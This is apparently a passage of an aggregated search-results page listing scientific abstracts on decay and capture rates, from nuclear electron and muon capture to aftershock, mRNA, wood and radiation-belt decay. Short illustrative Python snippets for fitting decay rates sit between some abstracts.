measuring these ratios have so far suffered from overwhelming background generated by these high-energy electrons. Recently, a unique background-free method for measuring EC branching ratios was proposed using the TITAN ion trap at the TRIUMF ISAC (Isotope Separator and ACcelerator) radioactive beam facility. The measurements will make use of the EBIT (Electron Beam Ion Trap) operating in Penning mode where electrons from the β--decay will be confined by the magnetic field. K-shell X-rays from EC will be detected by seven X-ray detectors located around the trap, thus providing orders of magnitude background suppression and thus ideal low-BR measurement environment. 6. Calculation of doublet capture rate for muon capture in deuterium within chiral effective field theory Adam, J.; Tater, M.; Truhlík, E.; Epelbaum, E.; Machleidt, R.; Ricci, P. 2012-03-01 The doublet capture rate Λ1 / 2 of the negative muon capture in deuterium is calculated employing the nuclear wave functions generated from accurate nucleon-nucleon (NN) potentials constructed at next-to-next-to-next-to-leading order of heavy-baryon chiral perturbation theory and the weak meson exchange current operator derived within the same formalism. 
All but one of the low-energy constants that enter the calculation were fixed from pion-nucleon and nucleon-nucleon scattering data. The low-energy constant dˆR (cD), which cannot be determined from the purely two-nucleon data, was extracted recently from the triton β-decay and the binding energies of the three-nucleon systems. The calculated values of Λ1 / 2 show a rather large spread for the used values of the dˆR. Precise measurement of Λ1 / 2 in the future will not only help to constrain the value of dˆR, but also provide a highly nontrivial test of the nuclear chiral EFT framework. Besides, the precise knowledge of the constant dˆR will allow for consistent calculations of other two-nucleon weak processes, such as proton-proton fusion and solar neutrino scattering on deuterons, which are important for astrophysics. 7. Aftershock Decay Rates in the Iranian Plateau Ommi, S.; Zafarani, H.; Zare, M. 2016-07-01 Motivated by the desire to have more information following the occurrence of damaging events, the main purpose of this article is to study aftershock sequence parameters in the Iranian plateau. To this end, the catalogue of the Iranian earthquakes between 2002 to the end of 2013 has been collected and homogenized among which 15 earthquakes have been selected to study their aftershock decay rates. For different tectonic provinces, the completeness magnitudes ( M c) of the earthquake catalogue have been calculated in different time intervals. Also, the M c variability in spatial and temporal windows has been determined for each selected event. For major Iranian earthquakes, catalogue of aftershocks has been collected thanks to three declustering methods: first, the classical windowing method of Gardner and Knopoff (Bull Seismol Soc Am 64:1363-1367, 1974); second, a modified version of this using spatial windowing based on the Wells and Coppersmith (Bull Seismol Soc Am 84:974-1002, 1994) relations; and third, the Burkhard and Grünthal (Swiss J Geosci 102:149-188, 2009) scheme. Effects of the temporal windows also have been investigated using the time periods of 1 month, 100 days, and 1 year in the declustering method of Gardner and Knopoff (Bull Seismol Soc Am 64:1363-1367, 1974). In the next step, the modified Omori law coefficients have been calculated for the 15 selected earthquakes. The calibrated regional generic model describing the temporal and magnitude distribution of aftershocks is of interest for time-dependent seismic hazard forecasts. The regional characteristics of the aftershock decay rates have been studied for the selected Iranian earthquakes in the Alborz, Zagros and Central Iran regions considering their different seismotectonics regimes. However, due to the lack of sufficient data, no results have been reported for the Kopeh-Dagh and Makran seismotectonic regions. 8. Gamow-Teller strength and lepton captures rates on 66‑71Ni in stellar matter Charge-changing transitions play a significant role in stellar weak-decay processes. The fate of the massive stars is decided by these weak-decay rates including lepton (positron and electron) captures rates, which play a consequential role in the dynamics of core collapse. As per previous simulation results, weak interaction rates on nickel (Ni) isotopes have significant influence on the stellar core vis-à-vis controlling the lepton content of stellar matter throughout the silicon shell burning phases of high mass stars up to the presupernova stages. 
In this paper, we perform a microscopic calculation of Gamow-Teller (GT) charge-changing transitions, in the β-decay and electron capture (EC) directions, for neutron-rich Ni isotopes (66‑71Ni). We further compute the associated weak-decay rates for these selected Ni isotopes in stellar environment. The computations are accomplished by employing the deformed proton-neutron quasiparticle random phase approximation (pn-QRPA) model. A recent study showed that the deformed pn-QRPA theory is well suited for the estimation of GT transitions. The astral weak-decay rates are determined over densities in the range of 10-1011g/cm3 and temperatures in the range of 0.01 × 109-30 × 109K. The calculated lepton capture rates are compared with the previous calculation of Pruet and Fuller (PF). The overall comparison demonstrates that, at low stellar densities and high temperatures, our EC rates are bigger by as much as two orders of magnitude. Our results show that, at higher temperatures, the lepton capture rates are the dominant mode for the stellar weak rates and the corresponding lepton emission rates may be neglected. 9. Weak {gamma}-transition intensities in the electron capture decay of {sup 144}Pm SciTech Connect Robinson, S.J.; Altgilbers, A.S.; Hindi, M.M.; Norman, E.B.; Larimer, R. 1996-09-01 We have determined the absolute intensity of weak {gamma} transitions in the level scheme of {sup 144}Nd, observed following the electron capture decay of {sup 144}Pm. The absolute intensity of the 1397-keV {ital E}3 branch from the 2093-keV (5{sub 1}{sup {minus}}) level was determined to be (4.9 {plus_minus} 0.7) {times} 10{sup {minus}4}{percent}. This leads to a revised absolute transition rate of {ital B}({ital E}3;5{sub 1}{sup {minus}}{r_arrow}2{sup +}{sub 1})=26{sub {minus}12}{sup +15} Weisskopf units, which is still consistent with an interpretation of the 5{sub 1}{sup {minus}} level based on quadrupole-octupole coupling. {copyright} {ital 1996 The American Physical Society.} 10. Search for Environmental Influences on the ^7Be Decay Rate* Norman, E. B.; Rech, G. A.; Dragowsky, M. R.; Chan, Y. D.; Perillo Isaac, M. C.; Larimer, R.-M. 1998-10-01 ^7Be plays an important role in the generation of solar neutrinos. Because ^7Be decays via electron capture, its half life depends on the electron density at the nucleus. Two groups have recently reported observations of variations on the order of 1 percent in the decay rate of ^7Be as a function of the physical environment in which the ^7Be is located.^1,2 In order to test this idea, we measured the half life of ^7Be in four different materials. Samples of ^7Be in graphite, boron nitride, tantalum, and gold were produced at LBNL's 88" Cyclotron. Each ^7Be sample was packaged together with a ^133Ba reference source and then counted in 1-day time bins periodically over a 4-month period using a germanium detector. In order to reduce systematic effects from variations in detector or electronics performance, the ^7Be half life was determined by comparing the numbers of 478-keV ^7Be and 356-keV ^133Ba gamma rays from each sample. Results from analysis of this data will be presented. *Work supported by the U.S. Dept. of Energy under contract Nos. DE-AC03-76SF00098 and DE-FG03-98ER41060. 1. D. Souza et al., Bull. Am. Phys. Soc. 42, 1679 (1997). 2. A. Ray et al., submitted to Phys. Rev. Lett. (1998). 11. Absolute intensity of internal bremsstrahlung from the electron capture decay of {sup 125}I SciTech Connect Hindi, M.M.; Kozub, R.L.; Robinson, S.J. 
1995-11-01 The absolute intensity of the internal bremsstrahlung spectrum accompanying the electron capture decay of {sup 125}I has been measured and compared to the recent calculation of Suric {ital et} {ital al}. The measured intensity above the 1{ital s} end point is found to be (86{plus_minus}10)% of the calculated intensity. 12. Comment on Double K -shell ionization in the electron capture decay of sup 55 Fe'' SciTech Connect Hindi, M.M.; Kozub, R.L. ); Nagy, H.J. ); Schupp, G. ) 1991-11-01 The corrections made in a recent paper to the published values for double {ital K}-shell ionization in the electron capture decays of {sup 54}Mn and {sup 65}Zn are not applicable to the data from which these values were derived. Attention is called to a recent article that is relevant to the topic of the paper. 13. Heritable variation of mRNA decay rates in yeast. PubMed Andrie, Jennifer M; Wakefield, Jon; Akey, Joshua M 2014-12-01 Gene expression levels are determined by the balance between rates of mRNA transcription and decay, and genetic variation in either of these processes can result in heritable differences in transcript abundance. Although the genetics of gene expression has been a subject of intense interest, the contribution of heritable variation in mRNA decay rates to gene expression variation has received far less attention. To this end, we developed a novel statistical framework and measured allele-specific differences in mRNA decay rates in a diploid yeast hybrid created by mating two genetically diverse parental strains. We estimate that 31% of genes exhibit allelic differences in mRNA decay rates, of which 350 can be identified at a false discovery rate of 10%. Genes with significant allele-specific differences in mRNA decay rates have higher levels of polymorphism compared to other genes, with all gene regions contributing to allelic differences in mRNA decay rates. Strikingly, we find widespread evidence for compensatory evolution, such that variants influencing transcriptional initiation and decay have opposite effects, suggesting that steady-state gene expression levels are subject to pervasive stabilizing selection. Our results demonstrate that heritable differences in mRNA decay rates are widespread and are an important target for natural selection to maintain or fine-tune steady-state gene expression levels. © 2014 Andrie et al.; Published by Cold Spring Harbor Laboratory Press. 14. Heritable variation of mRNA decay rates in yeast PubMed Central Andrie, Jennifer M.; Wakefield, Jon 2014-01-01 Gene expression levels are determined by the balance between rates of mRNA transcription and decay, and genetic variation in either of these processes can result in heritable differences in transcript abundance. Although the genetics of gene expression has been a subject of intense interest, the contribution of heritable variation in mRNA decay rates to gene expression variation has received far less attention. To this end, we developed a novel statistical framework and measured allele-specific differences in mRNA decay rates in a diploid yeast hybrid created by mating two genetically diverse parental strains. We estimate that 31% of genes exhibit allelic differences in mRNA decay rates, of which 350 can be identified at a false discovery rate of 10%. Genes with significant allele-specific differences in mRNA decay rates have higher levels of polymorphism compared to other genes, with all gene regions contributing to allelic differences in mRNA decay rates. 
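For readers who want a concrete picture of what an allele-specific mRNA decay rate is, the following minimal Python sketch (not the authors' statistical framework) fits the first-order decay model A(t) = A0 exp(-k t) to each allele by a log-linear regression and compares the fitted rates; all numbers are synthetic.

import numpy as np

def fit_decay_rate(times_min, abundances):
    # First-order decay: log A(t) = log A0 - k * t, so the decay rate k is
    # minus the slope of log(abundance) versus time.
    slope, _intercept = np.polyfit(times_min, np.log(abundances), 1)
    return -slope

t = np.array([0.0, 10.0, 20.0, 40.0, 60.0])      # minutes after transcription shut-off
allele_a = 1000.0 * np.exp(-0.030 * t)           # synthetic transcript counts
allele_b = 1000.0 * np.exp(-0.045 * t)           # synthetic transcript counts
k_a, k_b = fit_decay_rate(t, allele_a), fit_decay_rate(t, allele_b)
print(f"k_A = {k_a:.3f}/min, k_B = {k_b:.3f}/min, ratio = {k_b / k_a:.2f}")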
Strikingly, we find widespread evidence for compensatory evolution, such that variants influencing transcriptional initiation and decay have opposite effects, suggesting that steady-state gene expression levels are subject to pervasive stabilizing selection. Our results demonstrate that heritable differences in mRNA decay rates are widespread and are an important target for natural selection to maintain or fine-tune steady-state gene expression levels. PMID:25258386 15. Detection and assessment of wood decay in glulam beams using a decay rate approach Senalik, Adam; Beall, Frank C.; Reis, Henrique 2010-04-01 A glulam beam retired from the field and without visible indications of wood decay was used. Towards detection and assessing wood decay, X-ray computer tomography and ultrasonic measurements were carried out. It was observed that decrease in mass density with increasing levels of wood decay affects x-rays attenuation and allows radioscopy to detect and assess wood decay. To detect and assess decay when only one lateral side of the beam is available, a modified impulse-echo is presented. The modified impulse-echo approach is based on observing the dynamic response of each lamina in the glulam beam to the drop of a steel sphere onto a steel plate coupled to the glulam beam lamina and upon a decay rate analysis of the corresponding time domain signal in a frequency band of interest. The selection of the frequency band of interest only requires knowledge of the nominal transverse dimensions of each lamina in the beam and of the corresponding wood species. It was observed that decay rate analysis allows detection and assessment of wood decay. The decay rate approach leads to an overall rate of false calls of 7.2%. Considering the variability that exists in wood including the presence of splits, orientation and thickness of growth rings, etc., this relative low rate of false calls makes this approach very attractive. Results show that results from both X-ray computer tomography and impulse-echo decay-rated based measurements are consistent with each other and can be used to detect and assess wood decay in structural lumber. 16. Detection and Assessment of Wood Decay in Glulam Beams Using a Decay Rate Approach: A Review Treesearch 2013-01-01 A glulam beam is subjected to X-ray computer tomography and acousto-ultrasonic measurements to detect and assess wood decay. A glulam beam without visible indications of wood decay was taken from field use. A modified impulse-echo technique is employed as an inspection method requiring access to only one side of the beam. It is observed that decay-rate analysis of the... 17. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2012 CFR 2012-07-01 ... 40 Protection of Environment 34 2012-07-01 2012-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 18. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2014 CFR 2014-07-01 ... 40 Protection of Environment 33 2014-07-01 2014-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 19. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2013 CFR 2013-07-01 ... 
40 Protection of Environment 34 2013-07-01 2013-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 20. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2011 CFR 2011-07-01 ... 40 Protection of Environment 33 2011-07-01 2011-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 1. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2010 CFR 2010-07-01 ... 40 Protection of Environment 32 2010-07-01 2010-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 2. Decay rates of the magnetohydrodynamic model for quantum plasmas Pu, Xueke; Xu, Xiuli 2017-02-01 In this paper, we consider the quantum magnetohydrodynamic model for quantum plasmas. We prove the optimal decay rates for the solution to the constant state in the whole space in the Lp-norm with 2≤ p≤ 6 and its first derivatives in L2-norm. The proof is based on the optimal decay of the linearized equation and nonlinear energy estimates. 3. Sensitivity studies for the main r process: β-decay rates SciTech Connect Mumpower, M.; Cass, J.; Passucci, G.; Aprahamian, A.; Surman, R. 2014-04-15 The pattern of isotopic abundances produced in rapid neutron capture, or r-process, nucleosynthesis is sensitive to the nuclear physics properties of thousands of unstable neutron-rich nuclear species that participate in the process. It has long been recognized that the some of the most influential pieces of nuclear data for r-process simulations are β-decay lifetimes. In light of experimental advances that have pushed measurement capabilities closer to the classic r-process path, we revisit the role of individual β-decay rates in the r process. We perform β-decay rate sensitivity studies for a main (A > 120) r process in a range of potential astrophysical scenarios. We study the influence of individual rates during (n, γ)-(γ, n) equilibrium and during the post-equilibrium phase where material moves back toward stability. We confirm the widely accepted view that the most important lifetimes are those of nuclei along the r-process path for each astrophysical scenario considered. However, we find in addition that individual β-decay rates continue to shape the final abundance pattern through the post-equilibrium phase, for as long as neutron capture competes with β decay. Many of the lifetimes important for this phase of the r process are within current or near future experimental reach. 4. Modern Measurements of Uranium Decay Rates Parsons-Moss, T.; Faye, S. A.; Williams, R. W.; Wang, T. F.; Renne, P. R.; Mundil, R.; Harrison, M.; Bandong, B. B.; Moody, K.; Knight, K. B. 2015-12-01 It has been widely recognized that accurate and precise decay constants (λ) are critical to geochronology as highlighted by the EARTHTIME initiative, particularly the calibration benchmarks λ235U and λ238U. [1] Alpha counting experiments in 1971[2] measured λ235U and λ238U with ~0.1% precision, but have never been independently validated. 
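To see why a ~0.1% decay-constant uncertainty is a limiting factor for geochronology, the sketch below propagates it through the standard U-Pb age equation t = ln(1 + 206Pb*/238U) / λ238. The isotope ratio is a hypothetical placeholder; the λ238 value used is the commonly adopted one traced to the 1971 counting experiments mentioned above.

import math

LAMBDA_238 = 1.55125e-10          # 1/yr, commonly adopted value
RATIO = 0.5                       # hypothetical radiogenic 206Pb*/238U ratio

def u_pb_age(ratio, lam):
    # Standard age equation for the 238U -> 206Pb system.
    return math.log(1.0 + ratio) / lam

age = u_pb_age(RATIO, LAMBDA_238)
age_shifted = u_pb_age(RATIO, LAMBDA_238 * (1.0 - 0.001))   # lambda 0.1% lower
print(f"age = {age / 1e9:.4f} Gyr; a 0.1% shift in lambda moves it by "
      f"{(age_shifted - age) / 1e6:.2f} Myr")

The fractional error in λ maps almost one-to-one onto the age, which is why sub-0.1% decay-constant measurements are the stated goal.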
We are embarking on new direct measurements of λ235U, λ238U, λ234Th, and λ234U using independent approaches for each nuclide. For the measurement of λ235U, highly enriched 235U samples will be chemically purified and analyzed for U concentration and isotopic composition by multi-collector inductively coupled plasma mass spectrometry (MC-ICP-MS). Thin films will be electrodeposited from these solutions and the α activity will be measured in an α-γ coincidence counting apparatus, which allows reduced uncertainty in counting efficiency while achieving adequate counting statistics. For λ238U measurement we will measure ingrowth of 234Th in chemically purified, isotopically enriched 238U solutions, by quantitatively separating the Th and allowing complete decay to 234U. All of the measurements will be done using MC-ICP-MS aiming at 0.05% precision. This approach is expected to result in values of λ238U with less than 0.1% uncertainty, if combined with improved λ234Th measements. These will be achieved using direct decay measurements with an E-∆E charged particle telescope in coincidence with a gamma detector. This system allows measurement of 234Th β-decay and simultaneous detection and identification of α particles emitted by the 234U daughter, thus observing λ234U at the same time. The high-precision λ234U obtained by the direct activity measurements can independently verify the commonly used values obtained by indirect methods.[3] An overarching goal of the project is to ensure the quality of results including metrological traceability in order to facilitate implementation across diverse disciplines. [1] T 5. Double K-shell vacancy production in the electron capture decay of 125I Hindi, M. M.; Kozub, R. L. 1992-03-01 We have measured the probability of double K-shell vacancy production in the electron capture decay of 125I to the 35-keV level of 125Te. The probability was deduced from the number of triple coincidences between the Te hypersatellite and satellite x rays produced in filling the double vacancy, and the subsequent normal x ray accompanying the K internal conversion of the 35-keV level. The probability of double K-shell vacancy production per K-shell electron capture (PKK) was found to be (1.35+/-0.15)×10-5. 6. Double K-shell ionization in the electron capture decay of 55Fe Campbell, J. L.; Maxwell, J. A.; Teesdale, W. J. 1991-04-01 The probability per K capture for double K-shell ionization in the electron capture decay of 55Fe was obtained by fitting a model spectrum to the x-ray spectrum recorded to very high statistics in a high-resolution Si(Li) detector. The result, PKK=(1.3+/-0.2)×10-4, confirms the trend wherein experimental data decrease smoothly with Z, and are intermediate between the theoretical predictions of Intemann and of Suzuki and Law. Corrections to some recently published PKK values reconcile them with this trend. 7. A comparison of radiative capture with decay gamma-ray method in bore hole logging for economic minerals USGS Publications Warehouse Senftle, F.E.; Moxham, R.M.; Tanner, A.B. 1972-01-01 The recent availability of borehole logging sondes employing a source of neutrons and a Ge(Li) detector opens up the possibility of analyzing either decay or capture gamma rays. The most efficient method for a given element can be predicted by calculating the decay-to-capture count ratio for the most prominent peaks in the respective spectra. 
From a practical point of view such a calculation must be slanted toward short irradiation and count times at each station in a borehole. A simplified method of computation is shown, and the decay-to-capture count ratio has been calculated and tabulated for the optimum value in the decay mode irrespective of the irradiation time, and also for a ten minute irradiation time. Based on analysis of a single peak in each spectrum, the results indicate the preferred technique and the best decay or capture peak to observe for those elements of economic interest. ?? 1972. 8. Inverse method for estimating respiration rates from decay time series Forney, D. C.; Rothman, D. H. 2012-09-01 Long-term organic matter decomposition experiments typically measure the mass lost from decaying organic matter as a function of time. These experiments can provide information about the dynamics of carbon dioxide input to the atmosphere and controls on natural respiration processes. Decay slows down with time, suggesting that organic matter is composed of components (pools) with varied lability. Yet it is unclear how the appropriate rates, sizes, and number of pools vary with organic matter type, climate, and ecosystem. To better understand these relations, it is necessary to properly extract the decay rates from decomposition data. Here we present a regularized inverse method to identify an optimally-fitting distribution of decay rates associated with a decay time series. We motivate our study by first evaluating a standard, direct inversion of the data. The direct inversion identifies a discrete distribution of decay rates, where mass is concentrated in just a small number of discrete pools. It is consistent with identifying the best fitting "multi-pool" model, without prior assumption of the number of pools. However we find these multi-pool solutions are not robust to noise and are over-parametrized. We therefore introduce a method of regularized inversion, which identifies the solution which best fits the data but not the noise. This method shows that the data are described by a continuous distribution of rates, which we find is well approximated by a lognormal distribution, and consistent with the idea that decomposition results from a continuum of processes at different rates. The ubiquity of the lognormal distribution suggest that decay may be simply described by just two parameters: a mean and a variance of log rates. We conclude by describing a procedure that estimates these two lognormal parameters from decay data. Matlab codes for all numerical methods and procedures are provided. 9. Inverse method for estimating respiration rates from decay time series Forney, D. C.; Rothman, D. H. 2012-03-01 Long-term organic matter decomposition experiments typically measure the mass lost from decaying organic matter as a function of time. These experiments can provide information about the dynamics of carbon dioxide input to the atmosphere and controls on natural respiration processes. Decay slows down with time, suggesting that organic matter is composed of components (pools) with varied lability. Yet it is unclear how the appropriate rates, sizes, and number of pools vary with organic matter type, climate, and ecosystem. To better understand these relations, it is necessary to properly extract the decay rates from decomposition data. Here we present a regularized inverse method to identify an optimally-fitting distribution of decay rates associated with a decay time series. 
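A minimal sketch of the kind of regularized inversion described in the preceding abstract (illustrative only, not the authors' Matlab code): the decay series is modeled as a superposition of exponentials over a fixed grid of trial rates, and a Tikhonov penalty stabilizes the non-negative least-squares solution.

import numpy as np
from scipy.optimize import nnls

def invert_decay(t, g, rates, alpha=1e-2):
    # Model g(t) = sum_i m_i * exp(-k_i * t) on a fixed grid of rates k_i and
    # solve for non-negative masses m_i with a ridge (Tikhonov) penalty alpha.
    A = np.exp(-np.outer(t, rates))
    A_aug = np.vstack([A, np.sqrt(alpha) * np.eye(len(rates))])
    b_aug = np.concatenate([g, np.zeros(len(rates))])
    m, _residual = nnls(A_aug, b_aug)
    return m

t = np.linspace(0.0, 10.0, 200)                          # years, illustrative
g = 0.6 * np.exp(-2.0 * t) + 0.4 * np.exp(-0.2 * t)      # synthetic two-pool decay
rates = np.logspace(-2, 1, 40)                           # trial decay rates (1/yr)
m = invert_decay(t, g, rates)
print("recovered mass near k=2 and k=0.2:",
      m[np.argmin(np.abs(rates - 2.0))], m[np.argmin(np.abs(rates - 0.2))])

Fitting a lognormal to the recovered distribution would then reduce the description to the two parameters (mean and variance of log rates) emphasized in the abstract.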
We motivate our study by first evaluating a standard, direct inversion of the data. The direct inversion identifies a discrete distribution of decay rates, where mass is concentrated in just a small number of discrete pools. It is consistent with identifying the best fitting "multi-pool" model, without prior assumption of the number of pools. However, we find these multi-pool solutions are not robust to noise and are over-parametrized. We therefore introduce a method of regularized inversion, which identifies the solution which best fits the data but not the noise. This method shows that the data are described by a continuous distribution of rates, which we find is well approximated by a lognormal distribution, and consistent with the idea that decomposition results from a continuum of processes at different rates. The ubiquity of the lognormal distribution suggests that decay may be simply described by just two parameters: a mean and a variance of log rates. We conclude by describing a procedure that estimates these two lognormal parameters from decay data. Matlab codes for all numerical methods and procedures are provided. 10. Double K-shell vacancy production in the electron capture decay of 139Ce Hindi, M. M.; Kozub, R. L. 1991-02-01 The probability of double K-shell vacancy production in the electron capture decay of 139Ce to the 166-keV level of 139La has been investigated. Triple coincidences between the 166-keV gamma ray, the La satellite Kα x ray, and the La hypersatellite Kα x ray were measured using two intrinsic Ge detectors. We looked for the sum of two of the three radiations in one detector in coincidence with the third radiation in the other detector. The probability of double K-shell vacancy production per K-shell electron capture (PKK) was found to be (2.0+/-1.6)×10-6. From this and the known PKK for 131Cs we estimate a probability for zero K-shell vacancy production (shakedown) per K-shell electron capture of <~2.4×10-5 for 139Ce. 11. Decay rate of the second radiation belt NASA Technical Reports Server (NTRS) Badhwar, G. D.; Robbins, D. E. 1996-01-01 Variations in the Earth's trapped (Van Allen) belts produced by solar flare particle events are not well understood. Few observations of increases in particle populations have been reported. This is particularly true for effects in low Earth orbit, where manned spaceflights are conducted. This paper reports the existence of a second proton belt and its subsequent decay as measured by a tissue-equivalent proportional counter and a particle spectrometer on five Space Shuttle flights covering an eighteen-month period. The creation of this second belt is attributed to the injection of particles from a solar particle event which occurred at 2246 UT, March 22, 1991. Comparisons with observations onboard the Russian Mir space station and other unmanned satellites are made. Shuttle measurements and data from other spacecraft are used to determine the e-folding time of the peak of the second proton belt, which was ten months. Proton populations in the second belt returned to quiescent values within eighteen months. The increase in absorbed dose attributed to protons in the second belt was approximately 20%. Passive dosimeter measurements were in good agreement with this value. 12. Decay rate of the second radiation belt NASA Technical Reports Server (NTRS) Badhwar, G. D.; Robbins, D. E. 1996-01-01 Variations in the Earth's trapped (Van Allen) belts produced by solar flare particle events are not well understood. 
Few observations of increases in particle populations have been reported. This is particularly true for effects in low Earth orbit, where manned spaceflights are conducted. This paper reports the existence of a second proton belt and it's subsequent decay as measured by a tissue-equivalent proportional counter and a particle spectrometer on five Space Shuttle flights covering an eighteen-month period. The creation of this second belt is attributed to the injection of particles from a solar particle event which occurred at 2246 UT, March 22, 1991. Comparisons with observations onboard the Russian Mir space station and other unmanned satellites are made. Shuttle measurements and data from other spacecraft are used to determine that the e-folding time of the peak of the second proton belt. It was ten months. Proton populations in the second belt returned to values of quiescent times within eighteen months. The increase in absorbed dose attributed to protons in the second belt was approximately 20%. Passive dosimeter measurements were in good agreement with this value. 13. Decay rate of the second radiation belt. PubMed Badhwar, G D; Robbins, D E 1996-01-01 Variations in the Earth's trapped (Van Allen) belts produced by solar flare particle events are not well understood. Few observations of increases in particle populations have been reported. This is particularly true for effects in low Earth orbit, where manned spaceflights are conducted. This paper reports the existence of a second proton belt and it's subsequent decay as measured by a tissue-equivalent proportional counter and a particle spectrometer on five Space Shuttle flights covering an eighteen-month period. The creation of this second belt is attributed to the injection of particles from a solar particle event which occurred at 2246 UT, March 22, 1991. Comparisons with observations onboard the Russian Mir space station and other unmanned satellites are made. Shuttle measurements and data from other spacecraft are used to determine that the e-folding time of the peak of the second proton belt. It was ten months. Proton populations in the second belt returned to values of quiescent times within eighteen months. The increase in absorbed dose attributed to protons in the second belt was approximately 20%. Passive dosimeter measurements were in good agreement with this value. 14. Experimental Neutron Capture Rate Constraint Far from Stability Liddick, S. N.; Spyrou, A.; Crider, B. P.; Naqvi, F.; Larsen, A. C.; Guttormsen, M.; Mumpower, M.; Surman, R.; Perdikakis, G.; Bleuel, D. L.; Couture, A.; Crespo Campo, L.; Dombos, A. C.; Lewis, R.; Mosby, S.; Nikas, S.; Prokop, C. J.; Renstrom, T.; Rubio, B.; Siem, S.; Quinn, S. J. 2016-06-01 Nuclear reactions where an exotic nucleus captures a neutron are critical for a wide variety of applications, from energy production and national security, to astrophysical processes, and nucleosynthesis. Neutron capture rates are well constrained near stable isotopes where experimental data are available; however, moving far from the valley of stability, uncertainties grow by orders of magnitude. This is due to the complete lack of experimental constraints, as the direct measurement of a neutron-capture reaction on a short-lived nucleus is extremely challenging. Here, we report on the first experimental extraction of a neutron capture reaction rate on 69Ni, a nucleus that is five neutrons away from the last stable isotope of Ni. 
The implications of this measurement on nucleosynthesis around mass 70 are discussed, and the impact of similar future measurements on the understanding of the origin of the heavy elements in the cosmos is presented. 15. Experimental Neutron Capture Rate Constraint Far from Stability. PubMed Liddick, S N; Spyrou, A; Crider, B P; Naqvi, F; Larsen, A C; Guttormsen, M; Mumpower, M; Surman, R; Perdikakis, G; Bleuel, D L; Couture, A; Crespo Campo, L; Dombos, A C; Lewis, R; Mosby, S; Nikas, S; Prokop, C J; Renstrom, T; Rubio, B; Siem, S; Quinn, S J 2016-06-17 Nuclear reactions where an exotic nucleus captures a neutron are critical for a wide variety of applications, from energy production and national security, to astrophysical processes, and nucleosynthesis. Neutron capture rates are well constrained near stable isotopes where experimental data are available; however, moving far from the valley of stability, uncertainties grow by orders of magnitude. This is due to the complete lack of experimental constraints, as the direct measurement of a neutron-capture reaction on a short-lived nucleus is extremely challenging. Here, we report on the first experimental extraction of a neutron capture reaction rate on ^{69}Ni, a nucleus that is five neutrons away from the last stable isotope of Ni. The implications of this measurement on nucleosynthesis around mass 70 are discussed, and the impact of similar future measurements on the understanding of the origin of the heavy elements in the cosmos is presented. 16. Effects of vacuum fluctuation suppression on atomic decay rates SciTech Connect Ford, L.H.; Roman, Thomas A. 2011-08-15 Highlights: > Excited atoms are shot through a cavity containing an electromagnetic field. > Cavity is in the lowest mode in a non-classical state. > Such a state can suppress the decay rate of the atoms in certain situations. > We show that this effect can be correlated with periods of negative energy density. - Abstract: The use of atomic decay rates as a probe of sub-vacuum phenomena will be studied. Because electromagnetic vacuum fluctuations are essential for radiative decay of excited atomic states, decay rates can serve as a measure of the suppression of vacuum fluctuations in non-classical states, such as squeezed vacua. In such states, the renormalized expectation value of the square of the electric field or the energy density can be periodically negative, representing suppression of vacuum fluctuations. We explore the extent to which atomic decays can be used to measure the mean squared electric field or energy density. We consider a scheme in which atoms in an excited state transit a closed cavity whose lowest mode contains photons in a non-classical state. A crucial feature of our analysis is that we do not employ the rotating wave approximation. The change in the decay probability of the atom in the cavity due to the non-classical state can, under certain circumstances, serve as a measure of the mean squared electric field or energy density in the cavity. We make some estimates of the magnitude of this effect, which indicate that an experimental test might be possible, although very challenging. 17. Detailed description of exclusive muon capture rates using realistic two-body forces Giannaka, P. G.; Kosmas, T. S. 2015-07-01 Starting from state-by-state calculations of exclusive rates of the ordinary muon capture, we evaluated total μ- capture rates for a set of light- and medium-weight nuclear isotopes. 
We employed a version of the proton-neutron quasiparticle random-phase approximation (p n -QRPA, for short) which uses as realistic nuclear forces the Bonn C-D one-boson exchange potential. Special attention was paid on the percentage contribution to the total μ- capture rate of specific low-spin multipolarities resulting by summing over the corresponding multipole transitions. The nuclear method used offers the possibility of estimating separately the individual contributions to the total and partial rates of the polar-vector and axial-vector components of the weak-interaction Hamiltonian for each accessible final state of the daughter nucleus. One of our main goals is to provide a reliable description of the charge-changing transitions matrix elements entering the description of other similar semileptonic nuclear processes like the charged-current neutrino-nucleus reactions, the electron capture on nuclei, the single β±-decay mode, etc., which play important role in currently interesting laboratory and astrophysical applications like the neutrino detection through lepton-nucleus interaction probes and neutrino nucleosynthesis. Such results can also be useful in various ongoing muon capture experiments at Paul Scherrer Institute (PSI), Fermilab, Japan Proton Accelerator Research Complex, and Research Center for Nuclear Physics, Osaka University. 18. Uncertainties in the calculation of solar-neutrino capture rates SciTech Connect Filippone, B.W. 1981-01-01 A detailed estimate is presented of the possible uncertainty range for the neutrino flux from a standard solar model. Using present estimated errors in the key input parameters, detailed solar models are calculated to give an uncertainty in the theoretical nu/sub e/ capture rate in both the on-going /sup 37/Cl experiment and the proposed experiment using /sup 71/Ga. The uncertainty in capture rate is investigated by considering individual parameter variations about a mean model, by simultaneously varying several key parameters to yield upper and lower limits, and by a Monte Carlo 